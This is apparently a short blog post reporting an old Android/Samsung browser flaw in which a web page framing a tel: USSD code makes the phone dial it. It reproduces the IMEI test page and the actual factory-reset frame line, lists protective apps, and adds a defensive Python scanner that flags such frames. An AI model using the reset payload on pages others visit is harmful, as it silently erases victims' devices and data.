Android #Fail

It appears that going to a test URL with a certain iframe using the stock Android browser can perform a factory reset on the phone.

There was a URL posted in the XDA forums pointing to http://ninpo.qap.la/test/index.html to test whether or not the browser would invoke the dialer and present the IMEI. It worked on my Samsung Infuse 4G running stock Gingerbread so I’m guessing that a real exploit may factory reset my phone. Ugh…

Note: The link above could change at any time to the real exploit; use at your own risk. Here is the content of the test page.

<!DOCTYPE html>
<html>
<frameset>
<frame src="tel:*%2306%23">
</frameset>
</html>

The exploit code uses:
<frame src="tel:*2767*3855%23" />

Nice huh?

Reports have said it affects mainly Samsung devices but other reports have indicated an old Android bug affecting multiple devices. Should be interesting to see how this turns out…

Update: Confirmed that my Samsung Infuse 4G running Android 2.3.6 (Gingerbread) is vulnerable.

Link for exploit as well as other pertinent information: http://gizmodo.com/5946334/samsung-security-bug-can-wipe-out-your-galaxy-phone-updating

Samsung Infuse 4G Vulnerable to Exploit (YouTube)

1:12 – Phone Model / Version
3:56 – link clicked, dialer launched, performs format/reset
4:20 – reset
6:35 – files/folders gone

The NoTelURL app can be installed to prompt the user on which action to take.

Another app, ESET USSD (https://play.google.com/store/apps/details?id=com.eset.securedialer), will protect you from this exploit.
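
For checking page content rather than the handset, here is an added example (not from the original post or from either app above): a Python scan that a filtering proxy or crawler could run over HTML to flag frame/iframe elements whose src is a tel: URI, separating plain numbers from USSD/MMI codes after percent-decoding. The function names and the "any * or # means a service code" heuristic are assumptions of this example; the samples are the IMEI test page quoted above and one constructed page.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Elements the post shows being used: the URL in src loads without a tap.
AUTO_LOAD = {("frame", "src"), ("iframe", "src")}


def classify_tel(uri):
    """Return (kind, dial_string) for a tel: URI, or None for other schemes.

    Heuristic (assumption of this example): after percent-decoding, any '*'
    or '#' means the dialer receives a USSD/MMI service code, not a number.
    """
    scheme, _, rest = uri.strip().partition(":")
    if scheme.lower() != "tel":
        return None
    dial = unquote(rest)  # %23 -> '#', %2A -> '*'
    kind = "ussd" if ("*" in dial or "#" in dial) else "number"
    return kind, dial


class TelFrameFinder(HTMLParser):
    """Collects (tag, dial_string, kind) for auto-loaded tel: URIs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases names and decodes character references.
        for name, value in attrs:
            if value and (tag, name) in AUTO_LOAD:
                hit = classify_tel(value)
                if hit:
                    self.findings.append((tag, hit[1], hit[0]))


def scan(html):
    finder = TelFrameFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# The IMEI test page quoted in the post (straight quotes).
TEST_PAGE = '<!DOCTYPE html><html><frameset><frame src="tel:*%2306%23"></frameset></html>'
# Constructed sample: a tapped link (ignored) and a framed plain number.
CONSTRUCTED_PAGE = '<a href="tel:+15555550100">Call</a><iframe src="tel:+15555550100"></iframe>'

if __name__ == "__main__":
    for page in (TEST_PAGE, CONSTRUCTED_PAGE):
        print(scan(page))
```

Any finding is worth a look, since a frame has no reason to load a tel: URI on its own; the "ussd" kind is the one to block outright.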